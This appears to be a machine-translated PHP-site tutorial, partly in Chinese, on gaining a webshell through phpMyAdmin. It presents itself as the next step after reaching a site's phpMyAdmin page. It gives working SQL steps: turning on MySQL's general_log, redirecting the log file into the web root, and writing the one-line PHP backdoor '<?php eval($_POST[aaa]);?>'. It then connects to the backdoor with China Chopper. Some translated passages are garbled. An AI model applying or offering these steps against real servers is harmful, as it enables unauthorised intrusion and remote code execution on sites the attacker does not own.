About phpmyadmin new posture getshell

The following column phpmyadmin usage tutorial will introduce you to phpmyadmin’s new posture getshell. I hope it will be helpful to friends in need!

Baidu Encyclopedia: phpMyAdmin is a MySQL based on PHP and structured in Web-Base mode on the website host A database management tool that allows administrators to manage MySQL databases using a web interface. This web interface can be a better way to input complex SQL syntax in a simple way, especially when it comes to importing and exporting large amounts of data. One of the greater advantages is that phpMyAdmin is executed on the web server like other PHP programs, but you can use the HTML pages generated by these programs anywhere, that is, to remotely manage the MySQL database, and easily create, modify, and delete Databases and data tables. You can also use phpMyAdmin to create commonly used PHP syntax to facilitate the correctness of SQL syntax required when writing web pages.

In layman's terms, its function is to conveniently operate the database on the web page.

When we get the phpmyadmin page of a site, the next thing to do is getshell.

You can escalate privileges by writing a shell, and we need to meet the following conditions:

1. Database root permissions

2. Know the physical path of the website

3. The database has write permissions

Write into the shell through select '' INTO OUTFILE 'Website physical path'

This article mainly talks about the successful getshell when condition 3 is not met.

Utilization conditions: MySQL 5.0

The version of MySQL 5.0 will automatically create a log file, so the same is true for modifying global variables while the service is running. The file location can be changed, but you must have read and write permissions on the directory where the log is generated.

(It may be more demanding in the Linux environment, because the site directory is one user and MySQL is another user. Permission control is stricter, mainly depending on whether the permissions are properly configured)

First we test whether the site has write permission

Execute the sql statement       SHOW VARIABLES LIKE 'secure_file_priv'

# SQL statement SHOW VARIABLES LIKE 'secure_file_priv' performs a query to find secure_file_priv

secure-file-priv feature

The secure-file-priv parameter is used to limit LOAD DATA, SELECT ... OUTFILE, and LOAD_FILE() Which specified directory to transfer to.

• When the value of secure_file_priv is null, it means that mysql is restricted and import|export is not allowed

• When the value of secure_file_priv is /tmp/, it means that the restriction is not allowed The import|export of mysql can only occur in the /tmp/ directory

• When the value of secure_file_priv has no specific value, it means that there are no restrictions on the import|export of mysql

You can set its properties in the mysql-ini file

After testing, we do not have write permission

Then introduce two MySQL global variables (

general_log, general_log file)

##general log refers to the log storage status, There are two values ​​(ON/OFF). ON means on, OFF means off.
general log file refers to the path where the log is saved.
We can write a sentence Trojan into the mysql log and then move the mysql log path to the website directory to implement getshell

Execute the sql statement SHOW VARIABLES LIKE 'general_log% ' Perform fuzzy query

The log is closed by default

We execute the sql statement

set global general_log = "ON";     #开启日志
SET global general_log_file='网站下物理路径';  #更换日志路径

Successfully created

 然后执行特殊的查询语句

select  &#39;<?php eval($_POST[aaa]);?>&#39;

我们进入112233.php进行验证，成功写入shell

 最后进行菜刀连接，获得站点webshell

 

The above is the detailed content of About phpmyadmin new posture getshell. For more information, please follow other related articles on the PHP Chinese website!